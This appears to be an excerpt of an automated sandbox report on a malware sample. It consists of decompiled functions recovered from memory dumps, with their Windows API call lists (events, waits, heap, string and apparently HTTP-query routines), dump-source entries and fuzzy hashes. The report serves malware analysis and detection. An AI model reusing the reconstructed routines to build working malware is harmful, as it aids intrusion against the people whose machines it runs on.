                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01128f5b
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 01128F1E
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01128F37
                                                                                                                                                                                                                                            • Part of subcall function 01129D3A: WaitForMultipleObjects.KERNEL32(00000002,0112AA33,00000000,0112AA33,?,?,?,0112AA33,0000EA60), ref: 01129D55
                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 01128FB0
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01128FCB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2394032930-0
                                                                                                                                                                                                                                          • Opcode ID: 4db13346f08ef3fc0e7048cbaa4cecd24736a7544035da883bb88f17717990ee
                                                                                                                                                                                                                                          • Instruction ID: 4cf6cfe0d2eabac685bcb7ff6b0202e45bfeb535e7255cd16b19517ac3ec7214
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4db13346f08ef3fc0e7048cbaa4cecd24736a7544035da883bb88f17717990ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4031D732A0062CBFCB3A9FACCC44E6E77B9EF88358F150524E511D7190EB74D9619B54
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(80000002), ref: 01125057
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(0112A6F4), ref: 0112509B
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 011250AF
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 011250BD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                                                                                          • Opcode ID: 5d105f014e900f19d849a0d06c0c4f8d0fd438a9791b3fd3f38be5520c4dd9b8
                                                                                                                                                                                                                                          • Instruction ID: fbca1fd4704fccd2964f7e920ade353d67ff0e1d98153be0f1b21496e85be606
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d105f014e900f19d849a0d06c0c4f8d0fd438a9791b3fd3f38be5520c4dd9b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F31307591020AEFCB19DF98D8C49EE7BB9FF08300B20842EFA0597250E7359991CFA5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                          			E011272F2(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				signed int _t6;
                                                                                                                                                                                                                                          				intOrPtr _t8;
                                                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                                                          				short* _t19;
                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                          				signed int* _t28;
                                                                                                                                                                                                                                          				CHAR* _t30;
                                                                                                                                                                                                                                          				long _t31;
                                                                                                                                                                                                                                          				intOrPtr* _t32;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t6 =  *0x112d270; // 0xd448b889
                                                                                                                                                                                                                                          				_t32 = _a4;
                                                                                                                                                                                                                                          				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                          				_t8 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t3 = _t8 + 0x112e836; // 0x61636f4c
                                                                                                                                                                                                                                          				_t25 = 0;
                                                                                                                                                                                                                                          				_t30 = E01126AF7(_t3, 1);
                                                                                                                                                                                                                                          				if(_t30 != 0) {
                                                                                                                                                                                                                                          					_t25 = CreateEventA(0x112d2a8, 1, 0, _t30);
                                                                                                                                                                                                                                          					E0112147E(_t30);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t12 =  *0x112d25c; // 0x4000000a
                                                                                                                                                                                                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E011256A2() != 0) {
                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                          					_t28 = _a8;
                                                                                                                                                                                                                                          					if(_t28 != 0) {
                                                                                                                                                                                                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t31 = E01121493(_t32, 0);
                                                                                                                                                                                                                                          					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L20;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t19 =  *0x112d110( *_t32, 0x20);
                                                                                                                                                                                                                                          					if(_t19 != 0) {
                                                                                                                                                                                                                                          						 *_t19 = 0;
                                                                                                                                                                                                                                          						_t19 = _t19 + 2;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t31 = E01127827(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                          					if(_t31 == 0) {
                                                                                                                                                                                                                                          						if(_t25 == 0) {
                                                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                                                          							return _t31;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                          						if(_t31 == 0) {
                                                                                                                                                                                                                                          							L20:
                                                                                                                                                                                                                                          							if(_t25 != 0) {
                                                                                                                                                                                                                                          								CloseHandle(_t25);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L22;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                          0x011272f3
                                                                                                                                                                                                                                          0x011272fa
                                                                                                                                                                                                                                          0x01127304
                                                                                                                                                                                                                                          0x01127308
                                                                                                                                                                                                                                          0x0112730e
                                                                                                                                                                                                                                          0x0112731d
                                                                                                                                                                                                                                          0x01127324
                                                                                                                                                                                                                                          0x01127328
                                                                                                                                                                                                                                          0x0112733a
                                                                                                                                                                                                                                          0x0112733c
                                                                                                                                                                                                                                          0x0112733c
                                                                                                                                                                                                                                          0x01127341
                                                                                                                                                                                                                                          0x01127348
                                                                                                                                                                                                                                          0x0112739f
                                                                                                                                                                                                                                          0x0112739f
                                                                                                                                                                                                                                          0x011273a5
                                                                                                                                                                                                                                          0x011273a7
                                                                                                                                                                                                                                          0x011273a7
                                                                                                                                                                                                                                          0x011273b1
                                                                                                                                                                                                                                          0x011273b5
                                                                                                                                                                                                                                          0x011273c7
                                                                                                                                                                                                                                          0x011273c7
                                                                                                                                                                                                                                          0x011273cb
                                                                                                                                                                                                                                          0x011273d1
                                                                                                                                                                                                                                          0x011273d1
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01127361
                                                                                                                                                                                                                                          0x01127366
                                                                                                                                                                                                                                          0x0112736e
                                                                                                                                                                                                                                          0x01127372
                                                                                                                                                                                                                                          0x01127376
                                                                                                                                                                                                                                          0x01127376
                                                                                                                                                                                                                                          0x01127383
                                                                                                                                                                                                                                          0x01127387
                                                                                                                                                                                                                                          0x0112738b
                                                                                                                                                                                                                                          0x011273e0
                                                                                                                                                                                                                                          0x011273e6
                                                                                                                                                                                                                                          0x011273e6
                                                                                                                                                                                                                                          0x01127399
                                                                                                                                                                                                                                          0x0112739d
                                                                                                                                                                                                                                          0x011273d4
                                                                                                                                                                                                                                          0x011273d6
                                                                                                                                                                                                                                          0x011273d9
                                                                                                                                                                                                                                          0x011273d9
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011273d6
                                                                                                                                                                                                                                          0x0112739d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01127387

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 01126AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,01122098,74666F53,00000000,?,0112D00C,?,?), ref: 01126B2D
                                                                                                                                                                                                                                            • Part of subcall function 01126AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 01126B51
                                                                                                                                                                                                                                            • Part of subcall function 01126AF7: lstrcat.KERNEL32(00000000,00000000), ref: 01126B59
                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(0112D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0112555B,?,?,?), ref: 01127333
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0112555B,00000000,00000000,?,00000000,?,0112555B,?,?,?), ref: 01127393
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0112555B,?,?,?), ref: 011273C1
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0112555B,?,?,?), ref: 011273D9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 73268831-0
                                                                                                                                                                                                                                          • Opcode ID: af03dd6db00f0fdd365ddb59df4587062ec4be5e34c123945bcc37750a5d5010
                                                                                                                                                                                                                                          • Instruction ID: bd8217032999ba3b20208d6c38fdcbccd42b07fb3812fd7f792def980296caa4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af03dd6db00f0fdd365ddb59df4587062ec4be5e34c123945bcc37750a5d5010
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD215A32604372ABDB3D5E6CAC85B6F7799EF96720B150224FE21D71C4DB70C8208390
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                                          			E0112A1F1(void* __ecx, void* __esi) {
                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                          				long _t34;
                                                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                                                          				long _t42;
                                                                                                                                                                                                                                          				long _t56;
                                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                                          				intOrPtr* _t60;
                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t61 = __esi;
                                                                                                                                                                                                                                          				_t59 = __ecx;
                                                                                                                                                                                                                                          				_t60 =  *0x112d140; // 0x112ad41
                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                                                                          					_v20 = _t34;
                                                                                                                                                                                                                                          					if(_t34 != 0) {
                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                          						_push( &_v16);
                                                                                                                                                                                                                                          						_push( &_v8);
                                                                                                                                                                                                                                          						_push(_t61 + 0x2c);
                                                                                                                                                                                                                                          						_push(0x20000013);
                                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                          						_v8 = 4;
                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                          						if( *_t60() == 0) {
                                                                                                                                                                                                                                          							_t39 = GetLastError();
                                                                                                                                                                                                                                          							_v12 = _t39;
                                                                                                                                                                                                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                                                                          								L15:
                                                                                                                                                                                                                                          								return _v12;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                          							_t58 = E011258BE(_v8 + 1);
                                                                                                                                                                                                                                          							if(_t58 == 0) {
                                                                                                                                                                                                                                          								_v12 = 8;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_push( &_v16);
                                                                                                                                                                                                                                          								_push( &_v8);
                                                                                                                                                                                                                                          								_push(_t58);
                                                                                                                                                                                                                                          								_push(0x16);
                                                                                                                                                                                                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                          								if( *_t60() == 0) {
                                                                                                                                                                                                                                          									E0112147E(_t58);
                                                                                                                                                                                                                                          									_v12 = GetLastError();
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                                                                          					_v12 = _t56;
                                                                                                                                                                                                                                          					if(_t56 != 0) {
                                                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                          					_t42 = E01129D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                                                                          					_v12 = _t42;
                                                                                                                                                                                                                                          				} while (_t42 == 0);
                                                                                                                                                                                                                                          				goto L15;
                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                          0x0112a1f1
                                                                                                                                                                                                                                          0x0112a1f1
                                                                                                                                                                                                                                          0x0112a1fb
                                                                                                                                                                                                                                          0x0112a201
                                                                                                                                                                                                                                          0x0112a204
                                                                                                                                                                                                                                          0x0112a208
                                                                                                                                                                                                                                          0x0112a20e
                                                                                                                                                                                                                                          0x0112a213
                                                                                                                                                                                                                                          0x0112a22c
                                                                                                                                                                                                                                          0x0112a22f
                                                                                                                                                                                                                                          0x0112a233
                                                                                                                                                                                                                                          0x0112a237
                                                                                                                                                                                                                                          0x0112a238
                                                                                                                                                                                                                                          0x0112a23d
                                                                                                                                                                                                                                          0x0112a240
                                                                                                                                                                                                                                          0x0112a247
                                                                                                                                                                                                                                          0x0112a24e
                                                                                                                                                                                                                                          0x0112a2a1
                                                                                                                                                                                                                                          0x0112a2a7
                                                                                                                                                                                                                                          0x0112a2ad
                                                                                                                                                                                                                                          0x0112a2e8
                                                                                                                                                                                                                                          0x0112a2ee
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a2ad
                                                                                                                                                                                                                                          0x0112a254
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a25b
                                                                                                                                                                                                                                          0x0112a269
                                                                                                                                                                                                                                          0x0112a26c
                                                                                                                                                                                                                                          0x0112a26f
                                                                                                                                                                                                                                          0x0112a27b
                                                                                                                                                                                                                                          0x0112a27f
                                                                                                                                                                                                                                          0x0112a2e1
                                                                                                                                                                                                                                          0x0112a281
                                                                                                                                                                                                                                          0x0112a284
                                                                                                                                                                                                                                          0x0112a288
                                                                                                                                                                                                                                          0x0112a289
                                                                                                                                                                                                                                          0x0112a28a
                                                                                                                                                                                                                                          0x0112a28c
                                                                                                                                                                                                                                          0x0112a293
                                                                                                                                                                                                                                          0x0112a2d1
                                                                                                                                                                                                                                          0x0112a2dc
                                                                                                                                                                                                                                          0x0112a295
                                                                                                                                                                                                                                          0x0112a298
                                                                                                                                                                                                                                          0x0112a29c
                                                                                                                                                                                                                                          0x0112a29c
                                                                                                                                                                                                                                          0x0112a293
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a27f
                                                                                                                                                                                                                                          0x0112a254
                                                                                                                                                                                                                                          0x0112a218
                                                                                                                                                                                                                                          0x0112a21e
                                                                                                                                                                                                                                          0x0112a221
                                                                                                                                                                                                                                          0x0112a226
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a2b6
                                                                                                                                                                                                                                          0x0112a2be
                                                                                                                                                                                                                                          0x0112a2c3
                                                                                                                                                                                                                                          0x0112a2c6
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0112A208
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 0112A218
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0112A2A1
                                                                                                                                                                                                                                            • Part of subcall function 01129D3A: WaitForMultipleObjects.KERNEL32(00000002,0112AA33,00000000,0112AA33,?,?,?,0112AA33,0000EA60), ref: 01129D55
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 0112A2D6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 602384898-0
                                                                                                                                                                                                                                          • Opcode ID: c2ed256424f55885c20742af48766667e765b08db94e581e6f20b034c8b9307f
                                                                                                                                                                                                                                          • Instruction ID: b29cfca315950f447756f779a6a72a23cc1ac21cbc97ff3e306bf0b801fa06af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2ed256424f55885c20742af48766667e765b08db94e581e6f20b034c8b9307f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9318FB5900329FFDB35DFE4D98099EBBB8EF0A304F10497AE242A3501D731AA549F50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                                                                          			E011254AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                                                          				signed int* _t39;
                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t36 = __ecx;
                                                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                                                          				_v12 = _a4;
                                                                                                                                                                                                                                          				_t38 = E01124F1F(__ecx,  &_v32);
                                                                                                                                                                                                                                          				if(_t38 != 0) {
                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                          					_t39 = _a8;
                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                          						_t23 =  &(_t39[1]);
                                                                                                                                                                                                                                          						if(_t39[1] != 0) {
                                                                                                                                                                                                                                          							E01125749(_t23);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					return _t38;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(E01129138(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t40 = CreateEventA(0x112d2a8, 1, 0,  *0x112d340);
                                                                                                                                                                                                                                          				if(_t40 != 0) {
                                                                                                                                                                                                                                          					SetEvent(_t40);
                                                                                                                                                                                                                                          					Sleep(0xbb8);
                                                                                                                                                                                                                                          					CloseHandle(_t40);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_push( &_v32);
                                                                                                                                                                                                                                          				if(_a12 == 0) {
                                                                                                                                                                                                                                          					_t29 = E01129575(_t36);
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                                                          					_t29 = E0112A642(_t36);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t41 = _v16;
                                                                                                                                                                                                                                          				_t38 = _t29;
                                                                                                                                                                                                                                          				if(_v16 != 0) {
                                                                                                                                                                                                                                          					E0112568A(_t41);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_t38 != 0) {
                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t39 = _a8;
                                                                                                                                                                                                                                          					_t38 = E011272F2( &_v32, _t39);
                                                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                          0x011254ac
                                                                                                                                                                                                                                          0x011254b9
                                                                                                                                                                                                                                          0x011254bf
                                                                                                                                                                                                                                          0x011254c0
                                                                                                                                                                                                                                          0x011254c1
                                                                                                                                                                                                                                          0x011254c2
                                                                                                                                                                                                                                          0x011254c3
                                                                                                                                                                                                                                          0x011254c7
                                                                                                                                                                                                                                          0x011254d3
                                                                                                                                                                                                                                          0x011254d7
                                                                                                                                                                                                                                          0x0112555f
                                                                                                                                                                                                                                          0x0112555f
                                                                                                                                                                                                                                          0x01125562
                                                                                                                                                                                                                                          0x01125564
                                                                                                                                                                                                                                          0x0112556c
                                                                                                                                                                                                                                          0x01125572
                                                                                                                                                                                                                                          0x01125575
                                                                                                                                                                                                                                          0x01125575
                                                                                                                                                                                                                                          0x01125572
                                                                                                                                                                                                                                          0x01125580
                                                                                                                                                                                                                                          0x01125580
                                                                                                                                                                                                                                          0x011254ea
                                                                                                                                                                                                                                          0x011254ec
                                                                                                                                                                                                                                          0x011254ec
                                                                                                                                                                                                                                          0x01125503
                                                                                                                                                                                                                                          0x01125507
                                                                                                                                                                                                                                          0x0112550a
                                                                                                                                                                                                                                          0x01125515
                                                                                                                                                                                                                                          0x0112551c
                                                                                                                                                                                                                                          0x0112551c
                                                                                                                                                                                                                                          0x01125525
                                                                                                                                                                                                                                          0x01125529
                                                                                                                                                                                                                                          0x01125537
                                                                                                                                                                                                                                          0x0112552b
                                                                                                                                                                                                                                          0x0112552b
                                                                                                                                                                                                                                          0x0112552c
                                                                                                                                                                                                                                          0x0112552d
                                                                                                                                                                                                                                          0x0112552e
                                                                                                                                                                                                                                          0x0112552f
                                                                                                                                                                                                                                          0x01125530
                                                                                                                                                                                                                                          0x01125530
                                                                                                                                                                                                                                          0x0112553c
                                                                                                                                                                                                                                          0x0112553f
                                                                                                                                                                                                                                          0x01125543
                                                                                                                                                                                                                                          0x01125545
                                                                                                                                                                                                                                          0x01125545
                                                                                                                                                                                                                                          0x0112554c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112554e
                                                                                                                                                                                                                                          0x0112554e
                                                                                                                                                                                                                                          0x0112555b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112555b

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(0112D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 011254FD
                                                                                                                                                                                                                                          • SetEvent.KERNEL32(00000000), ref: 0112550A
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 01125515
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0112551C
                                                                                                                                                                                                                                            • Part of subcall function 01129575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0112553C,?,0112553C,?,?,?,?,?,0112553C,?), ref: 0112964F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2559942907-0
                                                                                                                                                                                                                                          • Opcode ID: 58c4c302b9d20bd3bc90ff4894dc6efce16bee53e3f5d69b2b3310316982f5e0
                                                                                                                                                                                                                                          • Instruction ID: 6f0e78bd48e4bd3e6f0f118b81b10475b493a24f7a18d9881f5031949540d335
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58c4c302b9d20bd3bc90ff4894dc6efce16bee53e3f5d69b2b3310316982f5e0
